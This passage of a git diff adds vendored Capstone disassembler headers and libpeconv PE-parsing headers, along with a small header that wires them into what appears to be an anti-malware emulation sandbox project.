XCORE_INS_SETCLK, + XCORE_INS_SET, + XCORE_INS_SETC, + XCORE_INS_SETD, + XCORE_INS_SETEV, + XCORE_INS_SETN, + XCORE_INS_SETPSC, + XCORE_INS_SETPT, + XCORE_INS_SETRDY, + XCORE_INS_SETSR, + XCORE_INS_SETTW, + XCORE_INS_SETV, + XCORE_INS_SEXT, + XCORE_INS_SHL, + XCORE_INS_SHR, + XCORE_INS_SSYNC, + XCORE_INS_ST16, + XCORE_INS_ST8, + XCORE_INS_STW, + XCORE_INS_SUB, + XCORE_INS_SYNCR, + XCORE_INS_TESTCT, + XCORE_INS_TESTLCL, + XCORE_INS_TESTWCT, + XCORE_INS_TSETMR, + XCORE_INS_START, + XCORE_INS_WAITEF, + XCORE_INS_WAITET, + XCORE_INS_WAITEU, + XCORE_INS_XOR, + XCORE_INS_ZEXT, + + XCORE_INS_ENDING, // <-- mark the end of the list of instructions +} xcore_insn; + +/// Group of XCore instructions +typedef enum xcore_insn_group { + XCORE_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + XCORE_GRP_JUMP, ///< = CS_GRP_JUMP + + XCORE_GRP_ENDING, // <-- mark the end of the list of groups +} xcore_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/platform.h b/ai_anti_malware/capstone/include/platform.h new file mode 100644 index 0000000..b0d1a2d --- /dev/null +++ b/ai_anti_malware/capstone/include/platform.h @@ -0,0 +1,110 @@ +/* Capstone Disassembly Engine */ +/* By Axel Souchet & Nguyen Anh Quynh, 2014 */ + +#ifndef CAPSTONE_PLATFORM_H +#define CAPSTONE_PLATFORM_H + +// handle C99 issue (for pre-2013 VisualStudio) +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < 1800) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif + +#else +// not MSVC -> C99 is supported +#include +#endif + + +// handle C99 issue (for pre-2013 VisualStudio) +#if 
defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) +// this system does not have inttypes.h + +#if defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#endif + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 
__PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/windowsce/intrin.h b/ai_anti_malware/capstone/include/windowsce/intrin.h new file mode 100644 index 0000000..fde4bde --- /dev/null +++ b/ai_anti_malware/capstone/include/windowsce/intrin.h @@ -0,0 +1,12 @@ + +#if defined(_MSC_VER) && defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) && !defined(__INTRIN_H_) && !defined(_INTRIN) +#define _STDINT + +#ifdef _M_ARM +#include +#if (_WIN32_WCE >= 0x700) && defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) +#include +#endif +#endif // _M_ARM + +#endif diff --git a/ai_anti_malware/capstone/include/windowsce/stdint.h b/ai_anti_malware/capstone/include/windowsce/stdint.h new file mode 100644 index 0000000..014a163 --- /dev/null +++ b/ai_anti_malware/capstone/include/windowsce/stdint.h @@ -0,0 +1,133 @@ + +#if defined(_MSC_VER) && defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) && !defined(_STDINT_H_) && !defined(_STDINT) +#define _STDINT + +typedef __int8 + int8_t, + int_least8_t; + +typedef __int16 + int16_t, + int_least16_t; + +typedef __int32 + int32_t, + int_least32_t, + int_fast8_t, + int_fast16_t, + int_fast32_t; + +typedef __int64 + int64_t, + intmax_t, + int_least64_t, + int_fast64_t; + +typedef unsigned __int8 + uint8_t, + uint_least8_t; + +typedef unsigned __int16 + uint16_t, + uint_least16_t; + +typedef unsigned __int32 + uint32_t, + uint_least32_t, + uint_fast8_t, + uint_fast16_t, + uint_fast32_t; + +typedef unsigned __int64 + uint64_t, + uintmax_t, + uint_least64_t, + uint_fast64_t; + +#ifndef _INTPTR_T_DEFINED +#define _INTPTR_T_DEFINED +typedef __int32 intptr_t; +#endif + +#ifndef _UINTPTR_T_DEFINED +#define _UINTPTR_T_DEFINED +typedef unsigned __int32 uintptr_t; +#endif + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN 
(-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 + +#define INT_LEAST8_MIN INT8_MIN +#define INT_LEAST16_MIN INT16_MIN +#define INT_LEAST32_MIN INT32_MIN +#define INT_LEAST64_MIN INT64_MIN +#define INT_LEAST8_MAX INT8_MAX +#define INT_LEAST16_MAX INT16_MAX +#define INT_LEAST32_MAX INT32_MAX +#define INT_LEAST64_MAX INT64_MAX +#define UINT_LEAST8_MAX UINT8_MAX +#define UINT_LEAST16_MAX UINT16_MAX +#define UINT_LEAST32_MAX UINT32_MAX +#define UINT_LEAST64_MAX UINT64_MAX + +#define INT_FAST8_MIN INT8_MIN +#define INT_FAST16_MIN INT32_MIN +#define INT_FAST32_MIN INT32_MIN +#define INT_FAST64_MIN INT64_MIN +#define INT_FAST8_MAX INT8_MAX +#define INT_FAST16_MAX INT32_MAX +#define INT_FAST32_MAX INT32_MAX +#define INT_FAST64_MAX INT64_MAX +#define UINT_FAST8_MAX UINT8_MAX +#define UINT_FAST16_MAX UINT32_MAX +#define UINT_FAST32_MAX UINT32_MAX +#define UINT_FAST64_MAX UINT64_MAX + +#define INTPTR_MIN INT32_MIN +#define INTPTR_MAX INT32_MAX +#define UINTPTR_MAX UINT32_MAX + +#define INTMAX_MIN INT64_MIN +#define INTMAX_MAX INT64_MAX +#define UINTMAX_MAX UINT64_MAX + +#define PTRDIFF_MIN INTPTR_MIN +#define PTRDIFF_MAX INTPTR_MAX + +#ifndef SIZE_MAX +#define SIZE_MAX UINTPTR_MAX +#endif + +#define SIG_ATOMIC_MIN INT32_MIN +#define SIG_ATOMIC_MAX INT32_MAX + +#define WCHAR_MIN 0x0000 +#define WCHAR_MAX 0xffff + +#define WINT_MIN 0x0000 +#define WINT_MAX 0xffff + +#define INT8_C(x) (x) +#define INT16_C(x) (x) +#define INT32_C(x) (x) +#define INT64_C(x) (x ## LL) + +#define UINT8_C(x) (x) +#define UINT16_C(x) (x) +#define UINT32_C(x) (x ## U) +#define UINT64_C(x) (x ## ULL) + +#define INTMAX_C(x) INT64_C(x) +#define UINTMAX_C(x) UINT64_C(x) + +#endif diff --git 
a/ai_anti_malware/head.h b/ai_anti_malware/head.h new file mode 100644 index 0000000..adc6ef8 --- /dev/null +++ b/ai_anti_malware/head.h @@ -0,0 +1,31 @@ +#pragma once +#define _CRT_SECURE_NO_WARNINGS +#include +#include +#include +#include +#include +#include +#include +#include + + +#include "unicorn/include/unicorn/unicorn.h" +#include "capstone/include/capstone/capstone.h" +#pragma comment(lib, "unicorn/unicorn.lib") +#pragma comment(lib, "capstone/capstone.lib") +#include "libpeconv/include/peconv.h" +#include "native_struct.h" +struct BasicPeInfo { + std::string inputFilePath; + bool isX64; + uint64_t RecImageBase; + uint64_t entryPoint; + uint64_t imageEnd; + bool isRelocated; + uint8_t* peBuffer; + size_t peSize; + PIMAGE_NT_HEADERS ntHead64; + PIMAGE_NT_HEADERS32 ntHead32; +}; +#include "sandbox.h" diff --git a/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt b/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt new file mode 100644 index 0000000..5961016 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt @@ -0,0 +1,83 @@ +cmake_minimum_required ( VERSION 2.8 ) +project ( libpeconv ) + +set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /MT") + +include_directories ( + include +) + +set (srcs + src/pe_hdrs_helper.cpp + src/pe_mode_detector.cpp + src/pe_raw_to_virtual.cpp + src/pe_virtual_to_raw.cpp + src/relocate.cpp + src/buffer_util.cpp + src/remote_pe_reader.cpp + src/imports_loader.cpp + src/delayed_imports_loader.cpp + src/fix_imports.cpp + src/pe_loader.cpp + src/pe_dumper.cpp + src/exports_lookup.cpp + src/function_resolver.cpp + src/hooks.cpp + src/exported_func.cpp + src/exports_mapper.cpp + src/resource_parser.cpp + src/file_util.cpp + src/resource_util.cpp + src/imports_uneraser.cpp + src/load_config_util.cpp + src/caves.cpp + src/util.cpp + src/fix_dot_net_ep.cpp + src/find_base.cpp + src/peb_lookup.cpp +) + +set (hdrs + include/peconv.h + include/peconv/pe_hdrs_helper.h + include/peconv/pe_mode_detector.h + 
include/peconv/pe_raw_to_virtual.h + include/peconv/pe_virtual_to_raw.h + include/peconv/relocate.h + include/peconv/util.h + include/peconv/buffer_util.h + include/peconv/remote_pe_reader.h + include/peconv/imports_loader.h + include/peconv/delayed_imports_loader.h + include/peconv/fix_imports.h + include/peconv/pe_loader.h + include/peconv/pe_dumper.h + include/peconv/exports_lookup.h + include/peconv/function_resolver.h + include/peconv/hooks.h + include/peconv/exported_func.h + include/peconv/exports_mapper.h + include/peconv/resource_parser.h + include/peconv/file_util.h + include/peconv/resource_util.h + include/peconv/imports_uneraser.h + include/peconv/load_config_util.h + include/peconv/load_config_defs.h + include/peconv/caves.h + include/peconv/find_base.h + include/peconv/peb_lookup.h + src/fix_dot_net_ep.h #not in API +) + +add_library ( ${PROJECT_NAME} STATIC ${hdrs} ${srcs} ) + +if(PECONV_LIB_INSTALL) + include(GNUInstallDirs) + + install(TARGETS ${PROJECT_NAME} + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR}) + + install(DIRECTORY "include/" DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}) +endif() diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv.h new file mode 100644 index 0000000..698ec87 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv.h @@ -0,0 +1,30 @@ +/** +* @file +* @brief Master include file, including everything else. 
+*/ + +#pragma once + +#include "peconv/buffer_util.h" +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/pe_mode_detector.h" +#include "peconv/pe_raw_to_virtual.h" +#include "peconv/pe_virtual_to_raw.h" +#include "peconv/relocate.h" +#include "peconv/remote_pe_reader.h" +#include "peconv/imports_loader.h" +#include "peconv/pe_loader.h" +#include "peconv/pe_dumper.h" +#include "peconv/exports_lookup.h" +#include "peconv/function_resolver.h" +#include "peconv/hooks.h" +#include "peconv/exports_mapper.h" +#include "peconv/caves.h" +#include "peconv/fix_imports.h" +#include "peconv/delayed_imports_loader.h" +#include "peconv/resource_parser.h" +#include "peconv/load_config_util.h" +#include "peconv/peb_lookup.h" +#include "peconv/find_base.h" + diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h new file mode 100644 index 0000000..7383ad3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h @@ -0,0 +1,76 @@ +/** +* @file +* @brief Definitions of the used buffer types. Functions for their allocation and deallocation. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Validates pointers, checks if the particular field is inside the given buffer. Sizes must be given in bytes. + */ + bool validate_ptr( + IN const void* buffer_bgn, + IN SIZE_T buffer_size, + IN const void* field_bgn, + IN SIZE_T field_size + ); + +//----------------------------------------------------------------------------------- +// +// supported buffers: +// + /** + A buffer allocated on the heap of a process, not aligned to the beginning of a memory page. + */ + typedef PBYTE UNALIGNED_BUF; + + /** + A buffer allocated in a virtual space of a process, aligned to the beginning of a memory page. + */ + typedef PBYTE ALIGNED_BUF; + +// +// alloc/free unaligned buffers: +// + /** + Allocates a buffer on the heap. 
Can be used in the cases when the buffer does not have to start at the beginning of a page. + */ + UNALIGNED_BUF alloc_unaligned(size_t buf_size); + + // + /** + Frees buffer allocated by alloc_unaligned. + */ + void free_unaligned(UNALIGNED_BUF section_buffer); + +// +// alloc/free aligned buffers: +// + + /** + Allocates a buffer of a virtual memory (using VirtualAlloc). Can be used in the cases when the buffer have to be aligned to the beginning of a page. + */ + ALIGNED_BUF alloc_aligned(size_t buffer_size, DWORD protect, ULONGLONG desired_base=NULL, bool is_x64 = false); + + /** + Frees buffer allocated by alloc_aligned. + */ + bool free_aligned(ALIGNED_BUF buffer, size_t buffer_size=0); + + //PE buffers (wrappers) + + /** + Allocates an aligned buffer for a PE file. + */ + ALIGNED_BUF alloc_pe_buffer(size_t buffer_size, DWORD protect, ULONGLONG desired_base=NULL); + + /** + Free the memory allocated with alloc_pe_buffer. + */ + bool free_pe_buffer(ALIGNED_BUF buffer, size_t buffer_size=0); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h new file mode 100644 index 0000000..7b5b5d7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h @@ -0,0 +1,27 @@ +/** +* @file +* @brief Functions related to finding caves in the loaded PE file. 
+*/ + +#pragma once + +#include + +namespace peconv { + + /** + Finds cave at the end of the image (extend last section's raw size without extending the full image size) + */ + PBYTE find_ending_cave(BYTE* module_ptr, size_t module_size, const DWORD cave_size, const DWORD cave_charact=IMAGE_SCN_MEM_READ); + + /** + Finds cave in the difference between the original raw size, and the raw size rounded to the aligmnent + */ + PBYTE find_alignment_cave(BYTE* modulePtr, size_t moduleSize, const DWORD cave_size, const DWORD req_charact = IMAGE_SCN_MEM_READ); + + /** + Finds cave at the end of the section, that comes from a NULL padding or INT3 padding + */ + PBYTE find_padding_cave(BYTE* modulePtr, size_t moduleSize, const size_t minimal_size, const DWORD req_charact = IMAGE_SCN_MEM_READ); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h new file mode 100644 index 0000000..7c875f9 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h @@ -0,0 +1,61 @@ +/** +* @file +* @brief Parsing and filling the Delayload Import Table. 
+*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "function_resolver.h" + +#if (defined(_WIN32_WINNT) && _WIN32_WINNT > 0x0601) || __MINGW32__ //Windows SDK version 6.1 (Windows 7) +#define DELAYLOAD_IMPORTS_DEFINED +#endif + +#ifndef DELAYLOAD_IMPORTS_DEFINED +#include "pshpack4.h" + +typedef struct _IMAGE_DELAYLOAD_DESCRIPTOR { + union { + DWORD AllAttributes; + struct { + DWORD RvaBased : 1; // Delay load version 2 + DWORD ReservedAttributes : 31; + } DUMMYSTRUCTNAME; + } Attributes; + + DWORD DllNameRVA; // RVA to the name of the target library (NULL-terminate ASCII string) + DWORD ModuleHandleRVA; // RVA to the HMODULE caching location (PHMODULE) + DWORD ImportAddressTableRVA; // RVA to the start of the IAT (PIMAGE_THUNK_DATA) + DWORD ImportNameTableRVA; // RVA to the start of the name table (PIMAGE_THUNK_DATA::AddressOfData) + DWORD BoundImportAddressTableRVA; // RVA to an optional bound IAT + DWORD UnloadInformationTableRVA; // RVA to an optional unload info table + DWORD TimeDateStamp; // 0 if not bound, + // Otherwise, date/time of the target DLL + +} IMAGE_DELAYLOAD_DESCRIPTOR, *PIMAGE_DELAYLOAD_DESCRIPTOR; + +typedef const IMAGE_DELAYLOAD_DESCRIPTOR *PCIMAGE_DELAYLOAD_DESCRIPTOR; + +#include "poppack.h" +#endif + +namespace peconv { + + /** + Get the Delayload Imports directory. Returns the pointer to the first descriptor. The size of the directory is passed via variable dir_size. + */ + IMAGE_DELAYLOAD_DESCRIPTOR* get_delayed_imps(IN const BYTE* modulePtr, IN const size_t moduleSize, OUT size_t &dir_size); + + /** + Fill the Delayload Imports in the given module. + \param modulePtr : the pointer to the module where the imports needs to be filled. 
+ \param moduleBase : the base to which the module was relocated, it may (or not) be the same as modulePtr + \param func_resolver : the resolver that will be used for loading the imports + \return : true if resolving all succeeded, false otherwise + */ + bool load_delayed_imports(BYTE* modulePtr, const ULONGLONG moduleBase, t_function_resolver* func_resolver = nullptr); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h new file mode 100644 index 0000000..4500813 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h @@ -0,0 +1,123 @@ +/** +* @file +* @brief A definition of ExportedFunc class - used for storing the details of the exported function. Helper functions related to the export parsing. +*/ + +#pragma once + +#include +#include +#include +#include + +namespace peconv { + + /** + Check if the pointer redirects to a forwarder - if so, return the length, otherwise return 0. + */ + size_t forwarder_name_len(BYTE* fPtr); + + /** + get the DLL name without the extension + */ + std::string get_dll_shortname(const std::string& str); + + /** + Get the function name from the string in a format: DLL_name.function_name + */ + std::string get_func_name(const std::string& str); + + /** + Convert ordinal value to the ordinal string (in a format #[ordinal]) + */ + std::string ordinal_to_string(DWORD func_ordinal); + + /** + Check if the given string is in a format typical for storing ordinals (#[ordinal]) + */ + bool is_ordinal_string(const std::string& str); + + /** + Get the ordinal value from the ordinal string (in a format #[ordinal]) + */ + DWORD ordinal_string_to_val(const std::string& str); + + /** + Convert the function in a format: DLL_name.function_name into a normalized form (DLL name in lowercase). 
+ */ + std::string format_dll_func(const std::string& str); + + /** + A class storing the information about the exported function. + */ + class ExportedFunc + { + public: + /** + Converts the name to the normalized format. + */ + static std::string formatName(std::string name); + + std::string libName; + std::string funcName; + DWORD funcOrdinal; + bool isByOrdinal; + + //default constructor: + ExportedFunc() : funcOrdinal(0), isByOrdinal(false) {} + + ExportedFunc(const ExportedFunc& other); + ExportedFunc(std::string libName, std::string funcName, DWORD funcOrdinal); + ExportedFunc(std::string libName, DWORD funcOrdinal); + ExportedFunc(const std::string &forwarderName); + + /** + Compare two functions with each other. + Gives the priority to the named functions: if one of the compared functions is unnamed, the named one is treated as smaller. + If both functions are unnamed, the function with the smaller ordinal is treated as smaller. + Otherwise, the function with the shorter name is treated as smaller. + */ + bool operator < (const ExportedFunc& other) const + { + //if only one function is named, give the preference to the named one: + const size_t thisNameLen = this->funcName.length(); + const size_t otherNameLen = other.funcName.length(); + if (thisNameLen == 0 && otherNameLen > 0) { + return false; + } + if (thisNameLen > 0 && otherNameLen == 0) { + return true; + } + //select by shorter lib name: + int cmp = libName.compare(other.libName); + if (cmp != 0) { + return cmp < 0; + } + if (thisNameLen == 0 || otherNameLen == 0) { + return this->funcOrdinal < other.funcOrdinal; + } + if (thisNameLen != otherNameLen) { + return thisNameLen < otherNameLen; + } + cmp = funcName.compare(other.funcName); + return cmp < 0; + } + + /** + Gets a string representation of the variable. Full info about the function: library, name, ordinal. + */ + std::string toString() const; + + /** + Gets a string representation of the variable. 
+      Short info about the function: only function name or ordinal (if the name is missing).
+      */
+      std::string nameToString() const;
+
+      /**
+      Checks if the record describes a valid function: it must have either a name or an ordinal.
+      DWORD(-1) is the "no ordinal" sentinel, so the comparison is made explicitly unsigned
+      (the original compared a DWORD against the signed literal -1, relying on implicit conversion).
+      */
+      bool isValid() const
+      {
+          return (!funcName.empty() || funcOrdinal != static_cast<DWORD>(-1));
+      }
+  };
+
+}; //namespace peconv
+
diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h
new file mode 100644
index 0000000..a3b1895
--- /dev/null
+++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h
@@ -0,0 +1,50 @@
+/**
+* @file
+* @brief Searching specific functions in PE's Exports Table.
+*/
+
+#pragma once
+#include <windows.h> // NOTE(review): include targets were lost in transfer (angle brackets stripped); restored - verify against upstream
+
+#include "pe_hdrs_helper.h"
+#include "function_resolver.h"
+#include "exports_mapper.h"
+
+#include <string>    // NOTE(review): restored include target - verify
+#include <vector>    // NOTE(review): restored include target - verify
+#include <algorithm> // NOTE(review): restored include target - verify
+
+namespace peconv {
+
+    /**
+    Gets the function address by the name. Uses Export Table lookup.
+    WARNING: doesn't work for the forwarded functions.
+    */
+    FARPROC get_exported_func(PVOID modulePtr, LPSTR wanted_name);
+
+    /**
+    Gets list of all the functions from a given module that are exported by names.
+    */
+    size_t get_exported_names(PVOID modulePtr, std::vector<std::string> &names_list); // NOTE(review): template argument lost in transfer; restored from usage - verify
+
+    /**
+    Function resolver using Export Table lookup.
+    */
+    class export_based_resolver : default_func_resolver {
+    public:
+        /**
+        Get the address (VA) of the function with the given name, from the given DLL.
+        Uses Export Table lookup as a primary method of finding the import. On failure it falls back to the default Functions Resolver.
+        \param func_name : the name of the function
+        \param lib_name : the name of the DLL
+        \return Virtual Address of the exported function
+        */
+        virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name);
+    };
+
+    /**
+    Read the DLL name from the Export Table.
+ */ + LPSTR read_dll_name(HMODULE modulePtr); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h new file mode 100644 index 0000000..e490861 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h @@ -0,0 +1,140 @@ +/** +* @file +* @brief A definition of ExportsMapper class. Creates a lookup of all the exported functions from the supplied DLLs. Allows to associate an address with a corresponding function. +*/ + +#pragma once + +#include + +#include +#include +#include +#include + +#include "pe_hdrs_helper.h" +#include "pe_raw_to_virtual.h" +#include "peconv/exported_func.h" +#include "peconv/file_util.h" + +namespace peconv { + + class ExportsMapper { + + public: + + /** + Appends the given DLL to the lookup table of exported functions. Returns the number of functions exported from this DLL (not forwarded). + \param moduleName : name of the DLL + \param modulePtr : buffer containing the DLL in a Virtual format + \param moduleBase : a base address to which the given DLL was relocated + */ + size_t add_to_lookup(std::string moduleName, HMODULE modulePtr, ULONGLONG moduleBase); + + /** + Appends the given DLL to the lookup table of exported functions. Returns the number of functions exported from this DLL (not forwarded). + Assumes that the module was relocated to the same address as is the address of the given buffer (modulePtr). + (A wrapper for the case if we are adding a DLL that was loaded within the current process.) + \param moduleName : name of the DLL + \param modulePtr : buffer containing the DLL in a Virtual format. + */ + size_t add_to_lookup(std::string moduleName, HMODULE modulePtr) + { + return add_to_lookup(moduleName, modulePtr, reinterpret_cast(modulePtr)); + } + + /** + Find the set of Exported Functions that can be mapped to the given VA. Includes forwarders, and function aliases. 
+      */
+      const std::set<ExportedFunc>* find_exports_by_va(ULONGLONG va) const
+      {
+          // lookup in the VA -> exports map; nullptr when the address is unknown
+          auto itr = va_to_func.find(va);
+          if (itr != va_to_func.end()) {
+              const std::set<ExportedFunc> &fSet = itr->second;
+              return &fSet;
+          }
+          return nullptr;
+      }
+
+      /**
+      Retrieve the full path of the DLL with the given short name.
+      */
+      std::string get_dll_path(std::string short_name) const
+      {
+          auto found = this->dll_shortname_to_path.find(short_name);
+          if (found == dll_shortname_to_path.end()) {
+              return "";
+          }
+          return found->second;
+      }
+
+      /**
+      Retrieve the full name of the DLL (including the extension) using its short name (without the extension).
+      */
+      std::string get_dll_fullname(std::string short_name) const
+      {
+          std::string dll_path = get_dll_path(short_name);
+          if (dll_path.length() == 0) return "";
+
+          return get_file_name(dll_path);
+      }
+
+      /**
+      Find an Exported Function that can be mapped to the given VA.
+      */
+      const ExportedFunc* find_export_by_va(ULONGLONG va) const
+      {
+          const std::set<ExportedFunc>* exp_set = find_exports_by_va(va);
+          if (exp_set == nullptr) return nullptr;
+
+          // the first element of the (ordered) set is the preferred export
+          auto fItr = exp_set->begin();
+          const ExportedFunc* func = &(*fItr);
+          return func;
+      }
+
+      void print_va_to_func(std::stringstream &stream) const;
+      void print_func_to_va(std::stringstream &stream) const;
+
+
+  private:
+      enum ADD_FUNC_RES { RES_INVALID = 0, RES_MAPPED = 1, RES_FORWARDED = 2 };
+      ADD_FUNC_RES add_function_to_lookup(HMODULE modulePtr, ULONGLONG moduleBase, size_t moduleSize, ExportedFunc &currFunc, DWORD callRVA);
+
+      bool add_forwarded(ExportedFunc &currFunc, DWORD callRVA, PBYTE modulePtr, size_t moduleSize);
+      bool add_to_maps(ULONGLONG va, ExportedFunc &currFunc);
+
+      size_t resolve_forwarders(const ULONGLONG va, ExportedFunc &currFunc);
+      size_t make_ord_lookup_tables(PVOID modulePtr, size_t moduleSize, std::map<ULONGLONG, DWORD> &va_to_ord); // NOTE(review): template arguments lost in transfer; restored as VA -> ordinal - verify against upstream
+
+  protected:
+      /**
+      Add a function and a VA into a mutual mapping.
+      */
+      void associateVaAndFunc(ULONGLONG va, const ExportedFunc& func)
+      {
+          // mutual mapping: one VA may be covered by many exports (aliases/forwarders),
+          // but each export resolves to exactly one VA
+          va_to_func[va].insert(func);
+          func_to_va[func] = va;
+      }
+
+      /**
+      A map associating VA of the function with the related exports.
+      */
+      std::map<ULONGLONG, std::set<ExportedFunc>> va_to_func; // NOTE(review): template arguments lost in transfer; restored from usage in associateVaAndFunc/find_exports_by_va - verify
+
+      /**
+      A map associating an exported function with its forwarders.
+      */
+      std::map<ExportedFunc, std::set<ExportedFunc>> forwarders_lookup; // NOTE(review): restored template arguments - verify
+
+      /**
+      A map associating an exported function with its VA.
+      */
+      std::map<ExportedFunc, ULONGLONG> func_to_va; // NOTE(review): restored template arguments - verify
+
+      /**
+      A map associating DLL shortname with the full path to the DLL.
+      */
+      std::map<std::string, std::string> dll_shortname_to_path; // NOTE(review): restored template arguments - verify
+  };
+
+}; //namespace peconv
diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h
new file mode 100644
index 0000000..7e46dd8
--- /dev/null
+++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h
@@ -0,0 +1,55 @@
+/**
+* @file
+* @brief Functions related to operations on files. Wrappers for read/write.
+*/
+
+#pragma once
+
+#include <windows.h> // NOTE(review): include targets lost in transfer; restored - verify against upstream
+#include <string>    // NOTE(review): restored include target (std::string used below) - verify
+
+#include "buffer_util.h"
+
+namespace peconv {
+
+    /**
+    Maps a file with the given path and copies its raw content into the output buffer.
+    If read_size is not zero, it reads maximum read_size of bytes. If read_size is zero, it reads the full file.
+    The actual read size is returned back in read_size.
+    Automatically allocates a buffer of the required size.
+    */
+    peconv::ALIGNED_BUF load_file(IN const char *filename, OUT size_t &r_size);
+
+    /**
+    Reads a raw content of the file with the given path.
+    If read_size is not zero, it reads maximum read_size of bytes. If read_size is zero, it reads the full file.
+    The actual read size is returned back in read_size.
